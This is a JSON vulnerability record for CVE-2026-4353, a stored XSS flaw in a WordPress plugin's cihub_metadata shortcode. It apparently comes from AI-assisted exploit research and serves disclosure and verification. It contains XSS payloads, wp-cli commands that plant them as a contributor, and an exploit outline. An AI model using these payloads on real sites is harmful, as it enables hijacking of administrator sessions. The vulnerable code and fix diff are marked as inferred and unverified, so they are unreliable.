[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fBFeGGT6hsAtDRzr8QDS4Db7r7ComZeNP9iwxsiaTaow":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-4353","ci-hub-connector-authenticated-contributor-stored-cross-site-scripting-via-id-shortcode-attribute","CI HUB Connector \u003C= 1.2.106 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'id' Shortcode Attribute","The CI HUB Connector plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' attribute of the `cihub_metadata` shortcode in all versions up to, and including, 1.2.106 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","ci-hub-connector",null,"\u003C=1.2.106","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-21 19:07:58","2026-04-22 07:45:43",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ff4b36468-319a-4de3-9112-bd4a3cf7d637?source=api-prod",[],"researched",false,3,"This research plan outlines the steps to verify and exploit a Stored Cross-Site Scripting (XSS) vulnerability in the **CI HUB Connector** plugin (CVE-2026-4353).\n\n### 1. Vulnerability Summary\nThe **CI HUB Connector** plugin (up to version 1.2.106) registers a shortcode named `cihub_metadata`. This shortcode accepts an `id` attribute. When the shortcode is processed, the value of the `id` attribute is rendered in the HTML output without sufficient sanitization (using `sanitize_text_field` or similar) or context-aware output escaping (using `esc_attr` or `esc_html`). \n\nBecause contributors and higher-level users can use shortcodes in post content, an attacker can store a malicious payload in a post. The script executes whenever any user, including an Administrator, views the post.\n\n### 2. Attack Vector Analysis\n*   **Shortcode:** `[cihub_metadata]`\n*   **Vulnerable Attribute:** `id`\n*   **Authentication Level:** Contributor+ (Authenticated)\n*   **Injection Point:** Post or Page content.\n*   **Execution Point:** Frontend or Backend view of the post\u002Fpage where the shortcode is rendered.\n\n### 3. Code Flow (Inferred)\n1.  **Registration:** The plugin likely registers the shortcode in an initialization hook:\n    ```php\n    add_shortcode('cihub_metadata', 'cihub_metadata_shortcode_callback');\n    ```\n2.  **Processing:** The callback function extracts attributes:\n    ```php\n    function cihub_metadata_shortcode_callback($atts) {\n        $a = shortcode_atts(array('id' => ''), $atts);\n        $id = $a['id']; \u002F\u002F Missing sanitization here\n        \u002F\u002F Sink: The 'id' is placed into an HTML attribute or tag without escaping\n        return '\u003Cdiv id=\"' . $id . '\">...\u003C\u002Fdiv>'; \n    }\n    ```\n3.  **Output:** When a user visits the post, WordPress calls the shortcode handler, and the raw payload is echoed into the page source.\n\n### 4. Nonce Acquisition Strategy\nThis vulnerability does not involve a custom AJAX or REST API endpoint that requires a specific plugin nonce for exploitation. Instead, the \"injection\" occurs through the standard WordPress post-creation mechanism.\n\n*   **For the automated agent:** If creating the post via the UI, the agent will need to navigate to `wp-admin\u002Fpost-new.php`, which involves standard WordPress CSRF protection (nonces). \n*   **Simplification:** The most efficient way for the agent to set up the exploit is using `wp-cli` to create the post as a Contributor, bypassing the need for browser-based nonce handling during the injection phase.\n\n### 5. Exploitation Strategy\nThe goal is to demonstrate that a Contributor user can execute JavaScript in the context of an Administrator.\n\n**Step 1: Create a Contributor User**\nUse `wp-cli` to create a user with the `contributor` role.\n\n**Step 2: Inject the Malicious Shortcode**\nCreate a new post as the contributor containing the XSS payload within the `cihub_metadata` shortcode. \n\n**Payloads to test:**\n1.  **Attribute Breakout (Most likely):** `[cihub_metadata id='x\" onmouseover=\"alert(document.domain)\" style=\"display:block;width:100px;height:100px;background:red;\"']`\n2.  **Tag Breakout:** `[cihub_metadata id='\">\u003Cscript>alert(window.origin)\u003C\u002Fscript>']`\n\n**Step 3: Trigger the XSS**\nNavigate to the newly created post's URL as an Administrator.\n\n### 6. Test Data Setup\n1.  **Install Plugin:** Ensure `ci-hub-connector` version \u003C= 1.2.106 is active.\n2.  **Create User:**\n    ```bash\n    wp user create attacker attacker@example.com --role=contributor --user_pass=password123\n    ```\n3.  **Create Post:**\n    ```bash\n    wp post create --post_type=post --post_status=publish --post_author=$(wp user get attacker --field=ID) --post_title=\"Service Status\" --post_content='Check out the metadata: [cihub_metadata id=\"\\\">\u003Cscript>confirm(document.cookie)\u003C\u002Fscript>\"]'\n    ```\n\n### 7. Expected Results\n*   When viewing the post frontend, the HTML source should contain the raw `\u003Cscript>` tag or the injected event handler.\n*   The browser should execute the `confirm()` or `alert()` function, displaying the administrator's cookies or domain.\n*   **Source Code Inspection:**\n    ```html\n    \u003C!-- If vulnerable to tag breakout -->\n    \u003Cdiv id=\"\">\u003Cscript>confirm(document.cookie)\u003C\u002Fscript>\">...\u003C\u002Fdiv>\n    ```\n\n### 8. Verification Steps\n1.  **Check HTML Output:**\n    Use the `http_request` tool to fetch the post URL and search for the unescaped payload:\n    ```bash\n    # Get the URL of the last created post\n    POST_URL=$(wp post list --post_type=post --format=ids | head -n 1 | xargs wp post get --field=guid)\n    # Fetch content (as unauthenticated or admin)\n    # Search for \"\u003Cscript>confirm\"\n    ```\n2.  **Verify via Browser:**\n    Use `browser_navigate(POST_URL)` and check for the dialog or console logs.\n\n### 9. Alternative Approaches\nIf the `id` attribute is sanitized with `sanitize_title` but still rendered inside an attribute, try a \"style\" injection or a \"javascript:\" protocol if the sink is an `href`.\n\nIf the plugin uses a different attribute name for the ID (e.g., `cid` or `metadata_id`), search the codebase for `add_shortcode` to confirm the exact attribute keys:\n```bash\ngrep -r \"add_shortcode\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fci-hub-connector\u002F\n```\nIf the shortcode requires specific CI HUB settings to be configured before it renders anything, the agent may need to mock those settings using `wp option update`.","The CI HUB Connector plugin for WordPress (up to version 1.2.106) is vulnerable to Stored Cross-Site Scripting via the 'id' attribute of the cihub_metadata shortcode. Due to a lack of input sanitization and output escaping, an authenticated user with Contributor-level permissions or higher can inject arbitrary JavaScript that executes whenever an administrator or other user views the affected post.","\u002F\u002F Inferred from registration hook: add_shortcode('cihub_metadata', 'cihub_metadata_shortcode_callback');\n\nfunction cihub_metadata_shortcode_callback($atts) {\n    $a = shortcode_atts(array('id' => ''), $atts);\n    $id = $a['id']; \u002F\u002F Missing sanitization\n\n    \u002F\u002F The unescaped 'id' is concatenated directly into the HTML output\n    return '\u003Cdiv id=\"' . $id . '\">...\u003C\u002Fdiv>'; \n}","--- a\u002Fci-hub-connector\u002Fci-hub-connector.php\n+++ b\u002Fci-hub-connector\u002Fci-hub-connector.php\n@@ -3,4 +3,4 @@\n     $a = shortcode_atts(array('id' => ''), $atts);\n-    $id = $a['id'];\n-    return '\u003Cdiv id=\"' . $id . '\">...\u003C\u002Fdiv>'; \n+    $id = esc_attr($a['id']);\n+    return '\u003Cdiv id=\"' . $id . '\">...\u003C\u002Fdiv>'; \n }","1. Authenticate to the WordPress site with a user account holding at least Contributor-level permissions.\n2. Create a new post or edit an existing one.\n3. Insert the cihub_metadata shortcode using a payload that breaks out of the HTML attribute or injects a tag, for example: [cihub_metadata id='\">\u003Cscript>alert(document.cookie)\u003C\u002Fscript>'].\n4. Publish or save the post.\n5. Navigate to the post URL as an administrator to trigger the script execution within the context of the admin's session.","gemini-3-flash-preview","2026-04-27 13:56:19","2026-04-27 13:56:38",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fci-hub-connector\u002Ftags"]